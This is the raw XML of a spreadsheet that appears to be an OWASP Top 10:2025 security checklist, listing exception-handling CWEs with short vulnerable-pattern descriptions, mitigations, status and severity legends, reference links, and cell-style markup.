    <t>Generic exception declaration discourages proper exception handling by callers.</t>
  </si>
  <si>
    <t>Declare specific exception types in throws clauses; use custom exception hierarchies for security events; document all exceptions that can be thrown; use checked exceptions for recoverable conditions.</t>
  </si>
  <si>
    <t>CWE-460</t>
  </si>
  <si>
    <t>Improper Cleanup on Thrown Exception</t>
  </si>
  <si>
    <t>When an exception is thrown, the software does not properly clean up resources.</t>
  </si>
  <si>
    <t>File handle leaked when exception occurs mid-processing — exhausts file descriptor limit.</t>
  </si>
  <si>
    <t>Database connection not returned to pool on exception, causing connection pool exhaustion.</t>
  </si>
  <si>
    <t>Encryption key not zeroed from memory when decryption exception thrown.</t>
  </si>
  <si>
    <t>Use try-with-resources (Java) or using (C#) for resource management; implement finally blocks for cleanup; use RAII patterns in C++; test resource cleanup on exception paths.</t>
  </si>
  <si>
    <t>CWE-476</t>
  </si>
  <si>
    <t>NULL Pointer Dereference</t>
  </si>
  <si>
    <t>The application dereferences a pointer that it expects to be valid but is NULL.</t>
  </si>
  <si>
    <t>User object returned as null when not found, then .getRole() called without null check — NullPointerException.</t>
  </si>
  <si>
    <t>Optional&lt;User&gt; returned from DB query, .get() called without .isPresent() check.</t>
  </si>
  <si>
    <t>Attacker causes null pointer crash in authentication handler by sending malformed request, creating DoS.</t>
  </si>
  <si>
    <t>Always check for null/None before dereferencing; use Optional types; use null-safe operators; use static analysis to detect potential null dereferences; use Kotlin/Swift null-safety features.</t>
  </si>
  <si>
    <t>CWE-478</t>
  </si>
  <si>
    <t>Missing Default Case in Switch/Case</t>
  </si>
  <si>
    <t>A switch/case statement does not have a default case, leading to unexpected behaviour with unexpected input.</t>
  </si>
  <si>
    <t>switch(userRole) with cases for USER and ADMIN but no default — unknown role skips all checks.</t>
  </si>
  <si>
    <t>State machine with no default case; attacker sends unexpected state value, jumping to wrong code path.</t>
  </si>
  <si>
    <t>Enum switch missing default — new enum value added later bypasses security check silently.</t>
  </si>
  <si>
    <t>Always include a default case in switch statements; use fail-secure defaults in the default case; review all switch statements in security-critical code; use exhaustive pattern matching.</t>
  </si>
  <si>
    <t>CWE-484</t>
  </si>
  <si>
    <t>Omitted Break Statement in Switch</t>
  </si>
  <si>
    <t>A switch/case statement is missing a break statement, causing fall-through to the next case.</t>
  </si>
  <si>
    <t>switch(role): case 'USER': allow_read(); case 'ADMIN': allow_write(); — USER falls through to allow_write().</t>
  </si>
  <si>
    <t>Authentication state machine falls through from UNAUTHENTICATED to AUTHENTICATED due to missing break.</t>
  </si>
  <si>
    <t>Switch on access level falls through granting progressively higher privileges.</t>
  </si>
  <si>
    <t>Always include break statements in switch cases; use code review to detect fall-through; prefer if/else chains for security-critical logic; use static analysis to detect fall-through.</t>
  </si>
  <si>
    <t>CWE-550</t>
  </si>
  <si>
    <t>Server-generated Error Message with Sensitive Information</t>
  </si>
  <si>
    <t>The server generates error messages that reveal internal system details.</t>
  </si>
  <si>
    <t>IIS default 500 error reveals ASP.NET version, server name, and stack trace.</t>
  </si>
  <si>
    <t>Custom error page catches exception but still passes e.getMessage() to the response.</t>
  </si>
  <si>
    <t>Django DEBUG=True error page reveals all environment variables in production.</t>
  </si>
  <si>
    <t>Configure production-safe error pages; suppress all server-generated debug information; use correlation IDs in user-facing errors; set DEBUG=False in production; review all error response templates.</t>
  </si>
  <si>
    <t>CWE-636</t>
  </si>
  <si>
    <t>Not Failing Securely (Failing Open)</t>
  </si>
  <si>
    <t>When an error occurs, the system defaults to granting access or performing the operation.</t>
  </si>
  <si>
    <t>try: check_permission() except: grant_access() — any exception grants access.</t>
  </si>
  <si>
    <t>Authentication service timeout causes gateway to pass request through unauthenticated.</t>
  </si>
  <si>
    <t>Firewall rule exception causes all traffic to be allowed rather than blocked.</t>
  </si>
  <si>
    <t>Implement fail-secure defaults (deny on error); test failure scenarios explicitly; use default-deny architecture; review all exception handlers for fail-open conditions.</t>
  </si>
  <si>
    <t>CWE-703</t>
  </si>
  <si>
    <t>Improper Check or Handling of Exceptional Conditions</t>
  </si>
  <si>
    <t>The product does not properly anticipate or handle exceptional conditions that rarely occur during normal operation.</t>
  </si>
  <si>
    <t>Memory allocation failure in authentication library not handled — undefined behaviour bypasses auth.</t>
  </si>
  <si>
    <t>Clock skew larger than expected causes time-based token validation to fail open.</t>
  </si>
  <si>
    <t>Disk full condition during audit logging causes security events to be silently dropped.</t>
  </si>
  <si>
    <t>Anticipate and test all exceptional conditions; implement monitoring for exceptional conditions; use chaos engineering; design systems to degrade gracefully; document exceptional condition handling.</t>
  </si>
  <si>
    <t>CWE-754</t>
  </si>
  <si>
    <t>Improper Check for Unusual or Exceptional Conditions</t>
  </si>
  <si>
    <t>The software does not check or improperly checks for unusual or exceptional conditions.</t>
  </si>
  <si>
    <t>Integer overflow in size calculation not checked — buffer too small allocated, causing overflow.</t>
  </si>
  <si>
    <t>Network timeout not handled — operation hangs indefinitely, causing resource exhaustion.</t>
  </si>
  <si>
    <t>Unexpected end of file not handled in certificate parser — security check skipped.</t>
  </si>
  <si>
    <t>Check for all edge cases and unusual conditions; test with boundary values, malformed inputs, and resource constraints; use fuzzing to discover unhandled conditions.</t>
  </si>
  <si>
    <t>CWE-755</t>
  </si>
  <si>
    <t>Improper Handling of Exceptional Conditions</t>
  </si>
  <si>
    <t>The product does not handle or incorrectly handles an exceptional condition.</t>
  </si>
  <si>
    <t>Exception during session validation causes session to be treated as valid rather than invalid.</t>
  </si>
  <si>
    <t>Exception in access control check allows operation to proceed as if check passed.</t>
  </si>
  <si>
    <t>Exception handler for network error triggers fail-open path in authentication middleware.</t>
  </si>
  <si>
    <t>Implement fail-secure exception handling; use defensive programming; test all exception paths; use security-focused code review for exception handlers; implement global exception handler with secure defaults.</t>
  </si>
  <si>
    <t>CWE-756</t>
  </si>
  <si>
    <t>Missing Custom Error Page</t>
  </si>
  <si>
    <t>The web server uses default error pages that reveal software version, technology stack, or directory structure.</t>
  </si>
  <si>
    <t>Default Apache 404 page reveals server version and OS information.</t>
  </si>
  <si>
    <t>Tomcat 500 error page shows full stack trace with class names and line numbers.</t>
  </si>
  <si>
    <t>IIS default error page exposes server version and ASP.NET details.</t>
  </si>
  <si>
    <t>Configure custom error pages for all HTTP error codes (400, 401, 403, 404, 500); remove server version from headers; test all error paths; use a catch-all error handler.</t>
  </si>
  <si>
    <t>OWASP Top 10:2025 Checklist — Legend &amp; Instructions (249 CWEs)</t>
  </si>
  <si>
    <t>CATEGORY SUMMARY</t>
  </si>
  <si>
    <t>A01 – Broken Access Control (40)</t>
  </si>
  <si>
    <t>CWE-22 to CWE-1275 — path traversal, IDOR, CSRF, SSRF, open redirect</t>
  </si>
  <si>
    <t>A02 – Security Misconfiguration (16)</t>
  </si>
  <si>
    <t>CWE-5 to CWE-1174 — XXE, cookie flags, debug code, config exposure</t>
  </si>
  <si>
    <t>A03 – Software Supply Chain Failures (6)</t>
  </si>
  <si>
    <t>CWE-477 to CWE-1395 — vulnerable/obsolete/unmaintained components</t>
  </si>
  <si>
    <t>A04 – Cryptographic Failures (32)</t>
  </si>
  <si>
    <t>CWE-261 to CWE-1241 — weak crypto, PRNG, key management, cleartext</t>
  </si>
  <si>
    <t>A05 – Injection (37)</t>
  </si>
  <si>
    <t>CWE-20 to CWE-917 — SQLi, XSS, CMDi, XXE, SSTI, LDAP, XPath</t>
  </si>
  <si>
    <t>A06 – Insecure Design (39)</t>
  </si>
  <si>
    <t>CWE-73 to CWE-1125 — cleartext storage, race conditions, attack surface</t>
  </si>
  <si>
    <t>A07 – Authentication Failures (36)</t>
  </si>
  <si>
    <t>CWE-258 to CWE-1393 — session fixation, weak auth, default credentials</t>
  </si>
  <si>
    <t>A08 – Software or Data Integrity Failures (14)</t>
  </si>
  <si>
    <t>CWE-345 to CWE-926 — deserialization, supply chain, malicious code</t>
  </si>
  <si>
    <t>A09 – Security Logging &amp; Alerting Failures (5)</t>
  </si>
  <si>
    <t>CWE-117, 221, 223, 532, 778 — log injection, omission, sensitive data</t>
  </si>
  <si>
    <t>A10 – Mishandling of Exceptional Conditions (24)</t>
  </si>
  <si>
    <t>CWE-209 to CWE-756 — fail open, null deref, uncaught exceptions</t>
  </si>
  <si>
    <t>STATUS VALUES</t>
  </si>
  <si>
    <t>Item not yet assessed in scope</t>
  </si>
  <si>
    <t>🔄 In Progress</t>
  </si>
  <si>
    <t>Currently being tested / partially assessed</t>
  </si>
  <si>
    <t>✅ Pass</t>
  </si>
  <si>
    <t>Tested — no vulnerability identified</t>
  </si>
  <si>
    <t>Vulnerability confirmed — requires remediation</t>
  </si>
  <si>
    <t>➖ N/A</t>
  </si>
  <si>
    <t>Not applicable to this application or scope</t>
  </si>
  <si>
    <t>Finding requires further analysis or validation</t>
  </si>
  <si>
    <t>SEVERITY LEVELS</t>
  </si>
  <si>
    <t>Immediate exploitation possible, full system compromise likely</t>
  </si>
  <si>
    <t>High</t>
  </si>
  <si>
    <t>Significant impact, likely exploitable with moderate effort</t>
  </si>
  <si>
    <t>Moderate impact, requires specific conditions to exploit</t>
  </si>
  <si>
    <t>Low</t>
  </si>
  <si>
    <t>Minor impact or difficult to exploit</t>
  </si>
  <si>
    <t>Informational</t>
  </si>
  <si>
    <t>Observation for awareness, no direct security impact</t>
  </si>
  <si>
    <t>REFERENCES</t>
  </si>
  <si>
    <t>OWASP Top 10:2025</t>
  </si>
  <si>
    <t>https://owasp.org/Top10/2025/</t>
  </si>
  <si>
    <t>MITRE CWE</t>
  </si>
  <si>
    <t>https://cwe.mitre.org/</t>
  </si>
  <si>
    <t>OWASP Testing Guide v4.2</t>
  </si>
  <si>
    <t>https://owasp.org/www-project-web-security-testing-guide/</t>
  </si>
  <si>
    <t>OWASP ASVS v5</t>
  </si>
  <si>
    <t>https://owasp.org/www-project-application-security-verification-standard/</t>
  </si>
  <si>
    <t>NIST SP 800-63B</t>
  </si>
  <si>
    <t>https://pages.nist.gov/800-63-3/sp800-63b.html</t>
  </si>
  <si>
    <t>PortSwigger Web Academy</t>
  </si>
  <si>
    <t>https://portswigger.net/web-security</t>
  </si>
  <si>
    <t>PayloadsAllTheThings</t>
  </si>
  <si>
    <t>https://github.com/swisskyrepo/PayloadsAllTheThings</t>
  </si>
  <si>
    <t>SecLists</t>
  </si>
  <si>
    <t>https://github.com/danielmiessler/SecLists</t>
  </si>
  <si>
    <t>OWASP Top 10:2025 — Category Summary</t>
  </si>
  <si>
    <t>ID</t>
  </si>
  <si>
    <t>CWEs</t>
  </si>
  <si>
    <t>Notable CWEs</t>
  </si>
  <si>
    <t>CWE-284, 285, 352, 601, 862, 863, 918</t>
  </si>
  <si>
    <t>Access control failures including IDOR, path traversal, CSRF, and SSRF — most prevalent category</t>
  </si>
  <si>
    <t>CWE-16, 489, 611, 942, 1004</t>
  </si>
  <si>
    <t>Misconfigured frameworks, XXE, missing security headers, exposed debug endpoints</t>
  </si>
  <si>
    <t>CWE-477, 1035, 1104, 1395</t>
  </si>
  <si>
    <t>Vulnerable, outdated, unmaintained, or malicious third-party components</t>
  </si>
  <si>
    <t>CWE-327, 330, 331, 338, 759, 916</t>
  </si>
  <si>
    <t>Weak crypto, poor key management, cleartext transmission, insufficient entropy</t>
  </si>
  <si>
    <t>CWE-79, 89, 78, 917, 94</t>
  </si>
  <si>
    <t>SQL/OS/LDAP/XPath/EL injection, XSS — highest CVE count of any category</t>
  </si>
  <si>
    <t>CWE-311, 362, 656, 657, 799, 841</t>
  </si>
  <si>
    <t>Design-level security flaws including race conditions, cleartext storage, attack surface</t>
  </si>
  <si>
    <t>CWE-287, 306, 307, 384, 521, 798, 1392</t>
  </si>
  <si>
    <t>Session fixation, brute force, default credentials, missing MFA, weak passwords</t>
  </si>
  <si>
    <t>CWE-345, 426, 502, 829, 915</t>
  </si>
  <si>
    <t>Deserialization, integrity verification failures, untrusted CDN, malicious code</t>
  </si>
  <si>
    <t>Security Logging &amp; Alerting Failures</t>
  </si>
  <si>
    <t>CWE-117, 223, 532, 778</t>
  </si>
  <si>
    <t>Log injection, sensitive data in logs, insufficient logging — community survey category</t>
  </si>
  <si>
    <t>CWE-209, 476, 636, 703, 754, 755</t>
  </si>
  <si>
    <t>New in 2025: fail-open, null dereference, uncaught exceptions, missing error pages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</si>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</sst>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8.0"/>
      <color rgb="FF444444"/>
      <name val="Arial"/>
    </font>
    <font>
      <b/>
      <sz val="9.0"/>
      <color rgb="FFFFFFFF"/>
      <name val="Arial"/>
    </font>
    <font>
      <b/>
      <sz val="8.0"/>
      <color rgb="FF888888"/>
      <name val="Arial"/>
    </font>
    <font>
      <b/>
      <sz val="8.0"/>
      <color rgb="FFFFFFFF"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="8.0"/>
      <color theme="1"/>
      <name val="Arial"/>
    </font>
    <font>
      <b/>
      <sz val="8.0"/>
      <color rgb="FF1565C0"/>
      <name val="Arial"/>
    </font>
    <font>
      <b/>
      <sz val="8.0"/>
      <color theme="1"/>
      <name val="Arial"/>
    </font>
    <font>
      <i/>
      <sz val="8.0"/>
      <color theme="1"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="8.0"/>
      <color rgb="FF1B5E20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111111"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color theme="1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F5F5F5"/>
        <bgColor rgb="FFF5F5F5"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF263238"/>
        <bgColor rgb="FF263238"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF1A237E"/>
        <bgColor rgb="FF1A237E"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF37474F"/>
        <bgColor rgb="FF37474F"/>
      </patternFill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212121"/>
        <bgColor rgb="FF212121"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF4E342E"/>
        <bgColor rgb="FF4E342E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B71C1C"/>
        <bgColor rgb="FFB71C1C"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF4A148C"/>
        <bgColor rgb="FF4A148C"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFEEF0FB"/>
        <bgColor rgb="FFEEF0FB"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFF0E0"/>
        <bgColor rgb="FFFFF0E0"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFE0F5E8"/>
        <bgColor rgb="FFE0F5E8"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFFFFF"/>
        <bgColor rgb="FFFFFFFF"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFF8F0"/>
        <bgColor rgb="FFFFF8F0"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFF0FFF4"/>
        <bgColor rgb="FFF0FFF4"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFEF0F5"/>
        <bgColor rgb="FFFEF0F5"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF880E4F"/>
        <bgColor rgb="FF880E4F"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFEEF8EE"/>
        <bgColor rgb="FFEEF8EE"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFF5EEF8"/>
        <bgColor rgb="FFF5EEF8"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFDF0EC"/>
        <bgColor rgb="FFFDF0EC"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFBF360C"/>
        <bgColor rgb="FFBF360C"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF006064"/>
        <bgColor rgb="FF006064"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFE5F7F8"/>
        <bgColor rgb="FFE5F7F8"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFF4EB"/>
        <bgColor rgb="FFFFF4EB"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFE65100"/>
        <bgColor rgb="FFE65100"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFEEF1F2"/>
        <bgColor rgb="FFEEF1F2"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFEEF4FD"/>
        <bgColor rgb="FFEEF4FD"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF33691E"/>
        <bgColor rgb="FF33691E"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFF3F8EE"/>
        <bgColor rgb="FFF3F8EE"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFF9F9F9"/>
        <bgColor rgb="FFF9F9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4" fillId="15" fontId="5" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill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15" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="top" wrapText="1"/>
    </xf>
    <xf borderId="4" fillId="15" fontId="8" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf borderId="4" fillId="15" fontId="9" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="top" wrapText="1"/>
    </xf>
    <xf borderId="4" fillId="16" fontId="10" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="top" wrapText="1"/>
    </xf>
    <xf borderId="4" fillId="17" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="top" wrapText="1"/>
    </xf>
    <xf borderId="4" fillId="18" fontId="12" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="4" fillId="15" fontId="13" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf borderId="4" fillId="18" fontId="5" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf borderId="4" fillId="18" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="top" wrapText="1"/>
    </xf>
    <xf borderId="4" fillId="18" fontId="8" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf borderId="4" fillId="18" fontId="9" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="top" wrapText="1"/>
    </xf>
    <xf borderId="4" fillId="19" fontId="10" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="top" wrapText="1"/>
    </xf>
    <xf borderId="4" fillId="20" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="top" wrapText="1"/>
    </xf>
    <xf borderId="4" fillId="18" fontId="13" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf borderId="4" fillId="15" fontId="12" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="4" fillId="15" fontId="12" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf borderId="4" fillId="18" fontId="12" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf borderId="4" fillId="21" fontId="5" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill="1" applyFont="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf borderId="4" fillId="22" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill="1" applyFont="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf borderId="4" fillId="21" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="top" wrapText="1"/>
    </xf>
    <xf borderId="4" fillId="21" fontId="8" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf borderId="4" fillId="21" fontId="9" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="top" wrapText="1"/>
    </xf>
    <xf borderId="4" fillId="21" fontId="12" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf borderId="4" fillId="21" fontId="13" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf borderId="4" fillId="23" fontId="5" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill="1" applyFont="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf borderId="4" fillId="11" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf borderId="4" fillId="23" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="top" wrapText="1"/>
    </xf>
    <xf borderId="4" fillId="23" fontId="8" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf borderId="4" fillId="23" fontId="9" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="top" wrapText="1"/>
    </xf>
    <xf borderId="4" fillId="23" fontId="12" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf borderId="4" fillId="23" fontId="13" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf borderId="4" fillId="24" fontId="5" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill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4" fillId="24" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="top" wrapText="1"/>
    </xf>
    <xf borderId="4" fillId="24" fontId="8" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf borderId="4" fillId="24" fontId="9" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="top" wrapText="1"/>
    </xf>
    <xf borderId="4" fillId="24" fontId="12" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf borderId="4" fillId="24" fontId="13" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf borderId="4" fillId="25" fontId="5" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill="1" applyFont="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf borderId="4" fillId="26" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill="1" applyFont="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf borderId="4" fillId="25" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="top" wrapText="1"/>
    </xf>
    <xf borderId="4" fillId="25" fontId="8" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf borderId="4" fillId="25" fontId="9" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="top" wrapText="1"/>
    </xf>
    <xf borderId="4" fillId="25" fontId="12" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf borderId="4" fillId="25" fontId="13" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf borderId="4" fillId="27" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill="1" applyFont="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf borderId="4" fillId="28" fontId="5" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill="1" applyFont="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf borderId="4" fillId="28" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="top" wrapText="1"/>
    </xf>
    <xf borderId="4" fillId="28" fontId="8" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf borderId="4" fillId="28" fontId="9" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="top" wrapText="1"/>
    </xf>
    <xf borderId="4" fillId="28" fontId="12" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf borderId="4" fillId="28" fontId="13" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf borderId="4" fillId="18" fontId="13" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="4" fillId="29" fontId="5" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill="1" applyFont="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf borderId="4" fillId="30" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill="1" applyFont="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf borderId="4" fillId="29" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="top" wrapText="1"/>
    </xf>
    <xf borderId="4" fillId="29" fontId="8" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf borderId="4" fillId="29" fontId="9" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="top" wrapText="1"/>
    </xf>
    <xf borderId="4" fillId="29" fontId="12" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf borderId="4" fillId="29" fontId="13" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf borderId="4" fillId="31" fontId="5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31" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="top" wrapText="1"/>
    </xf>
    <xf borderId="4" fillId="31" fontId="8" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf borderId="4" fillId="31" fontId="9" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="top" wrapText="1"/>
    </xf>
    <xf borderId="4" fillId="31" fontId="12" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf borderId="4" fillId="31" fontId="13" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf borderId="4" fillId="32" fontId="5" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill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4" fillId="32" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="top" wrapText="1"/>
    </xf>
    <xf borderId="4" fillId="32" fontId="8" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
